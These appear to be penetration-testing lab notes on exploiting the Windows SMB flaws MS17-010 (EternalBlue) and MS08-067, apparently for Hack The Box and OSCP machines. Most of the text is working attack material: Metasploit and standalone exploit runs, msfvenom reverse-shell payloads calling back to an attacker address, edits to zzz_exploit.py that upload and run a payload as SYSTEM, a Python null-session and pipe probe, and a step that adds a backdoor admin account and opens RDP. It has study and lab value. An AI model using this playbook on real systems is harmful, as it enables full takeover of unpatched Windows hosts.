# Eternal Blue

## REF:

* LegacyHTB, BlueHTB, [SambaSMB](/03-getting-in/03-samba.md), [WindowsCmdKungFu](/07-win-privesc/windows-cmd-kungfu.md)

## nmap

```
---------------------
nmap search and test:

PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds

> ls /usr/share/nmap/scripts/ | grep smb-vuln
.. smb-vuln-ms08-067.nse
.. smb-vuln-ms17-010.nse

> nmap --script vuln $IP -Pn -p 139,445                 ..noisy, runs every vuln script
> nmap --script "smb-vuln*" $IP -Pn -p 139,445          ..quote the glob or the shell expands it
> nmap --script smb-vuln-ms08-067 $IP -Pn -p 445        ..netapi bug, XP/2003 only (Legacy)
> nmap --script smb-vuln-ms17-010 $IP -sV -p 445        ..any SMBv1 host missing MS17-010 (Legacy and Blue)

The ms17-010 script needs a null session to IPC$; if anonymous login is refused it reports nothing,
which is not the same as "patched".

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
```

## Eternal Checker

* <https://github.com/3ndG4me/AutoBlue-MS17-010>
* Python 3 port of worawit's checker; needs impacket (pip3 install impacket) and mysmb.py from the same repo
* Same test as the nmap script: a PeekNamedPipe transaction on FID 0 that an unpatched server answers with STATUS_INSUFFICIENT_RESOURCES

```
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010

> python3 eternal_checker.py $IP
[*] Target OS: Windows 5.1                 ..5.1 = XP/2003, 6.1 = Win7/2008 R2
[!] The target is not patched  .. Vulnerable!!!
```

## Eternal Blue - Metasploit

* ms08_067_netapi: XP/2003 only (Legacy)
* ms17_010_eternalblue: Win7/2008 R2 x64 and later (Blue); it does not target XP/2003. For Legacy with an accessible named pipe use ms17_010_psexec, or the AutoBlue scripts in the sections below
* "set payload" only works after "use": the payload arch must match the module target (x64 for Blue)

```
> sudo msfconsole
> search ms08-067
> search ms17-010  ..better

use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms17_010_eternalblue  ..better
set RHOSTS $IP
set LHOST $MyIP
set payload windows/x64/meterpreter/reverse_tcp
show options
exploit

meterpreter > cd "C:\Documents and Settings\john\Desktop"   ..quote paths with spaces
meterpreter > cat user.txt
Flag !!!
```

## AutoBlue - Metasploit

* <https://github.com/3ndG4me/AutoBlue-MS17-010>
* shell_prep.sh: msfvenom builds the x86 and x64 payloads, prepends the kernel shellcode and merges both into shellcode/sc_all.bin; listener_prep.sh writes config.rc and starts one multi/handler job per arch

```
-----------------------------------
Prep: 
cd shellcode
./shell_prep.sh 

Auto generate a reverse shell with msfvenom? (Y/n) Y
LHOST for reverse connection   : 10.10.14.128
LPORT you want x64 to listen on: 4444
LPORT you want x86 to listen on: 6666
Type 0 for meterpreter shell 1 for regular cmd shell: 1
Type 0 staged payload or 1 for stageless payload    : 0

Generating x64 cmd shell (staged)...
msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=4444
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (staged)...
msfvenom -p windows/shell/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=6666
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

-----------------------------------
Listener:

> ../listener_prep.sh 

LHOST for reverse connection    : 10.10.14.128
LPORT for x64 reverse connection: 4444
LPORT for x86 reverse connection: 6666
Enter 0 for meterpreter shell or 1 for regular cmd shell: 1
Type 0 for staged payload or 1 for a stageless payload  : 0

Metasploit Starts:
Starting listener (staged)...
       =[ metasploit v5.0.88-dev                          ]
+ -- --=[ 2014 exploits - 1097 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
[*] Processing config.rc for ERB directives.
resource (config.rc)> use exploit/multi/handler
resource (config.rc)> set PAYLOAD windows/x64/shell/reverse_tcp
resource (config.rc)> set LHOST 10.10.14.128
resource (config.rc)> set LPORT 4444
resource (config.rc)> set ExitOnSession false
resource (config.rc)> set EXITFUNC thread
EXITFUNC => thread
resource (config.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:4444 
resource (config.rc)> set LPORT 6666
resource (config.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:6666 

msf5 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                        Payload opts
  --  ----                    -------                        ------------
  0   Exploit: multi/handler  windows/x64/shell/reverse_tcp  tcp://10.10.14.128:4444
  1   Exploit: multi/handler  windows/shell/reverse_tcp      tcp://10.10.14.128:6666

------------------------------------
Exploit (the step missing above; run from the repo root with both handlers still up):

> python3 eternalblue_exploit7.py $IP shellcode/sc_all.bin   ..Win7/2008 R2; eternalblue_exploit8.py for Win8/2012

Connected!   ..the session lands in the msf handler: sessions -i 1
```

## Shellprep, AutoMerge, Netcat: Exploit7

* No Metasploit
* Pick a stageless payload: nc cannot send the second stage, so a staged payload connects back and dies
* <https://outrunsec.com/2020/07/26/cyberseclabs-eternal-walkthrough/>

```
Shell Prep, AutoMerge, listen with Netcat

cd shellcode
./shell_prep.sh
Y                      ..auto-generate with msfvenom
$MyIP                  ..LHOST
4444                   ..x64 LPORT
5555                   ..x86 LPORT
1                      ..regular cmd shell
1                      ..stageless (required for nc)
32/64 generated, merged into shellcode/sc_all.bin

nc -lvnp 4444
nc -lvnp 5555          ..2 listeners, one per arch; the merged stub picks the arch at runtime

cd ..
python3 eternalblue_exploit7.py $IP shellcode/sc_all.bin
```

## AutoBlue - No MSF - zzz\_exploit.py

* Needs: mysmb.py in the same directory
* Unedited, smb_pwn() only creates c:\pwned.txt over the SYSTEM SMB session as proof of exec; for a shell you edit it (Named Pipes section below)
* Needs a named pipe the null/guest session (or the creds you have) can open; the exploit walks its pipe list and bails out if none opens
* Ex: legacyHTB..worked (XP hands out 'browser' anonymously) blueHTB..failed (Win7 does not, so you need creds or a pipe name)
```
> python3 zzz_exploit.py $IP

[*] Target OS: Windows 5.1
[+] Found pipe 'browser'             ..pipe was known
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x820f3240
SESSION: 0xe10855a8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe2148030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe21480d0
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^) 
[!] Executing interactive programs will hang shell!

C:\WINDOWS\system32>whoami  ..nt authority\system
```

## Exploit7 - No MSF - Manual Merge

* [Blog:Eternalblue\_exploit7.py](https://medium.com/@nimanthad/hack-the-box-blue-writeup-without-metasploit-5e05089a213d)
* <https://github.com/worawit/MS17-010>
* Assemble the x86 and x64 kernel shellcode with nasm, append a userland payload to each, then merge both blobs into one; the merged stub detects the arch at runtime
* This method skips the "Named Pipes" headache: exploit7 uses the SMB transaction overflow, not an admin SMB session
* EXITFUNC=thread: the payload thread exits on its own instead of killing its host process, so less chance of a crash/BSOD
* Stageless payloads (shell_reverse_tcp, underscore) because the listener is nc

```
nasm -f bin ./shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=$MyIP --platform windows -a x64 --format raw -o sc_x64_payload.bin EXITFUNC=thread
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

nasm -f bin ./shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=$MyIP --platform windows -a x86 --format raw -o sc_x86_payload.bin EXITFUNC=thread
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

python3 ./shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin   ..x86 first, then x64

nc -nlvp 443                                   ..listener up before the exploit
python3 eternalblue_exploit7.py $IP sc_all.bin
whoami ..nt authority\system
```

## AutoBlue - No MSF - zzz\_exploit.py - Named Pipes

* Custom Payload. No Metasploit.
* zzz\_exploit.py
* Needs: mysmb.py
* auxiliary/scanner/smb/pipe\_auditor .. Not allowed on OSCP
* <https://redteamzone.com/EternalBlue/>
* pipes = \[ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ] ..the list zzz_exploit.py tries when no pipe is given; check the code!
* more pipes: <https://github.com/3ndG4me/AutoBlue-MS17-010/issues/10>
* Ex: blueHTB

```
Payload
msfvenom -p windows/shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f exe -o exploit.exe

vi zzz_exploit.py
USERNAME = '//'                           .. anonymous authentication
PASSWORD = ''                             .. user/pass if you have one

in smb_pwn(): rename pwned.txt, uncomment smb_send_file/service_exec and point them at the payload
print('creating file c:\\exploit.exe on the target')
fid2 = smbConn.createFile(tid2, '/exploit.exe')       .. keep the closeFile()/disconnectTree() lines that follow
smb_send_file(smbConn, '/full/path/exploit.exe', 'C', '/exploit.exe')
service_exec(conn, r'cmd /c c:\exploit.exe')          .. runs as SYSTEM through a temporary service

nc -nvlp 4444                             .. listener first
python zzz_exploit.py                     .. prints usage
python zzz_exploit.py <ip> [pipe_name]
python zzz_exploit.py 10.x.x.x            .. pipe problem: none of the default pipes opens anonymously

msfconsole                                .. not allowed for OSCP
search pipe_auditor                       .. get pipe_name
use auxiliary/scanner/smb/pipe_auditor
options
set rhosts 10.x.x.x
run
\samr \ntsvcs \lsass \netlogon \browser   .. found Pipes

python zzz_exploit.py 10.x.x.x samr       .. give it one of the pipes that opened
C:\WINDOWS\system32>whoami                .. nt authority\system
```
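Added example, not code from the page, AutoBlue or worawit's repo: one Python 3 script, standard library only, that does on the wire what the nmap script and eternal_checker.py do in the "Eternal Checker" section (Negotiate, anonymous Session Setup, Tree Connect to IPC$, then a PeekNamedPipe transaction on FID 0; an unpatched srv.sys answers STATUS_INSUFFICIENT_RESOURCES), and then reuses the same null session to try the pipe names this section cares about, so you get the pipe_auditor answer without Metasploit. Packet layouts follow MS-CIFS; the PID/MID values, the "Windows 2000" native-OS strings, the pipe list, the DesiredAccess mask and the file name ms17_probe.py are my choices. The pipe probe only says whether a pipe opened anonymously, which is exactly what zzz_exploit.py needs; it does not test credentials.

```python
import socket, struct, sys

NEGOTIATE, SESSION_SETUP, TREE_CONNECT, NT_CREATE, TRANSACTION = 0x72, 0x73, 0x75, 0xA2, 0x25
TRANS_PEEK_NMPIPE = 0x0023
STATUS_SUCCESS, STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED = 0x0, 0xC0000008, 0xC0000022
STATUS_INSUFFICIENT_RESOURCES = 0xC0000205          # what an unpatched srv.sys answers
PIPES = ["browser", "spoolss", "netlogon", "lsarpc", "samr", "srvsvc", "wkssvc", "ntsvcs", "lsass"]

def smb_header(cmd, status=0, flags2=0x2801, tid=0, uid=0):
    # 32 bytes: proto, cmd, status, flags, flags2, pidhigh, signature, rsv, tid, pid, uid, mid
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", cmd, status, 0x18, flags2,
                       0, b"\x00" * 8, 0, tid, 0x4B2F, uid, 0x5EC5)

def netbios(smb):                 # NetBIOS session frame: type 0x00 + 24-bit big-endian length
    return struct.pack(">I", len(smb)) + smb

def body(params, data):           # WordCount + parameter words + ByteCount + data bytes
    return bytes([len(params) // 2]) + params + struct.pack("<H", len(data)) + data

def negotiate_request():
    dialects = b"\x02LANMAN1.0\x00\x02LM1.2X002\x00\x02NT LANMAN 1.0\x00\x02NT LM 0.12\x00"
    return netbios(smb_header(NEGOTIATE) + body(b"", dialects))

def session_setup_request():      # anonymous, non-extended security, ASCII strings
    # AndX none, MaxBuffer, MaxMpx, VcNumber, SessionKey, OEM/Unicode pw len 0, rsv, Caps=NT_STATUS
    params = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xFFDF, 2, 1, 0, 0, 0, 0, 0x40)
    data = b"\x00.\x00Windows 2000 2195\x00Windows 2000 5.0\x00"   # user "", domain ".", OS, LanMan
    return netbios(smb_header(SESSION_SETUP, flags2=0x2001) + body(params, data))

def tree_connect_request(host, uid):
    params = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)             # AndX none, Flags 0, PasswordLength 1
    data = b"\x00\\\\" + host.encode() + b"\\IPC$\x00?????\x00"  # password, path, service "?????"
    return netbios(smb_header(TREE_CONNECT, flags2=0x2001, uid=uid) + body(params, data))

def peek_named_pipe_request(tid, uid):
    name = b"\\PIPE\\\x00"
    off = 32 + 1 + 32 + 2 + len(name)   # Param/Data offset = end of packet (no params, no data)
    # TotalParam, TotalData, MaxParam, MaxData, MaxSetup, rsv, Flags, Timeout, rsv2, ParamCount,
    # ParamOffset, DataCount, DataOffset, SetupCount=2, rsv3, Setup=[PeekNamedPipe, FID 0]
    params = struct.pack("<HHHHBBHIHHHHHBBHH", 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0,
                         0, off, 0, off, 2, 0, TRANS_PEEK_NMPIPE, 0)
    return netbios(smb_header(TRANSACTION, tid=tid, uid=uid) + body(params, name))

def nt_create_request(tid, uid, pipe):
    name = b"\\" + pipe.encode() + b"\x00"
    # AndX none, rsv, NameLength (sans NUL), Flags, RootFID, DesiredAccess 0x2019F (r/w), AllocSize,
    # FileAttrs, ShareAccess RWD, FILE_OPEN, FILE_NON_DIRECTORY_FILE, Impersonation, SecFlags
    params = struct.pack("<BBHBHIIIQIIIIIB", 0xFF, 0, 0, 0, len(name) - 1, 0, 0, 0x0002019F,
                         0, 0, 7, 1, 0x40, 2, 0)
    return netbios(smb_header(NT_CREATE, flags2=0x2001, tid=tid, uid=uid) + body(params, name))

def nt_status(resp):              # status field of a response frame (4-byte NetBIOS + SMB header)
    return struct.unpack_from("<I", resp, 4 + 5)[0]

def verdict(status):
    if status == STATUS_INSUFFICIENT_RESOURCES:
        return "VULNERABLE"
    return "PATCHED" if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED) else "UNKNOWN 0x%08X" % status

def recv_smb(sock):
    hdr = sock.recv(4)
    if len(hdr) < 4:
        raise ConnectionError("no NetBIOS header (server closed?)")
    data, length = b"", struct.unpack(">I", hdr)[0] & 0xFFFFFF
    while len(data) < length:
        chunk = sock.recv(length - len(data))
        if not chunk:
            raise ConnectionError("connection closed mid-frame")
        data += chunk
    return hdr + data

def null_session(sock, host):     # Negotiate, anonymous login, IPC$ tree; returns (tid, uid)
    sock.sendall(negotiate_request()); recv_smb(sock)
    sock.sendall(session_setup_request()); r = recv_smb(sock)
    if nt_status(r) != STATUS_SUCCESS:
        raise RuntimeError("null session refused: 0x%08X" % nt_status(r))
    uid = struct.unpack_from("<H", r, 4 + 28)[0]
    sock.sendall(tree_connect_request(host, uid)); r = recv_smb(sock)
    if nt_status(r) != STATUS_SUCCESS:
        raise RuntimeError("IPC$ tree connect failed: 0x%08X" % nt_status(r))
    return struct.unpack_from("<H", r, 4 + 24)[0], uid

def check_ms17_010(host, port=445, timeout=5.0):
    with socket.create_connection((host, port), timeout=timeout) as s:
        tid, uid = null_session(s, host)
        s.sendall(peek_named_pipe_request(tid, uid))
        return verdict(nt_status(recv_smb(s)))

def probe_pipes(host, pipes=PIPES, port=445, timeout=5.0):   # pipes usable for zzz_exploit.py <ip> <pipe>
    found = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        tid, uid = null_session(s, host)
        for pipe in pipes:
            s.sendall(nt_create_request(tid, uid, pipe))
            if nt_status(recv_smb(s)) == STATUS_SUCCESS:
                found.append(pipe)
    return found

if __name__ == "__main__":
    print("[*] MS17-010:", check_ms17_010(sys.argv[1]))
    print("[*] pipes   :", probe_pipes(sys.argv[1]))
```

Run it as `python3 ms17_probe.py $IP`. A "null session refused" error means the box wants credentials before it will even talk to IPC$ (the Blue situation); put the creds into zzz_exploit.py's USERNAME/PASSWORD and skip the anonymous probe, or use the transaction-overflow route (exploit7) that needs no pipe at all. Each request is a separate function returning bytes, so the packets can be checked offline and compared against a Wireshark capture of the nmap script.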

## RDP Trick

* For a SYSTEM shell you already have; adding a local admin is noisy (event log, AV) so remove the user afterwards
* On XP the Windows Firewall may still block 3389 after the registry change; open it with netsh before connecting

```
C:\WINDOWS\system32>net user
C:\WINDOWS\system32>net user mikes hacks /add
C:\WINDOWS\system32>net localgroup administrators mikes /add

Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mikes -p hacks $IP          ..same user you just created
```

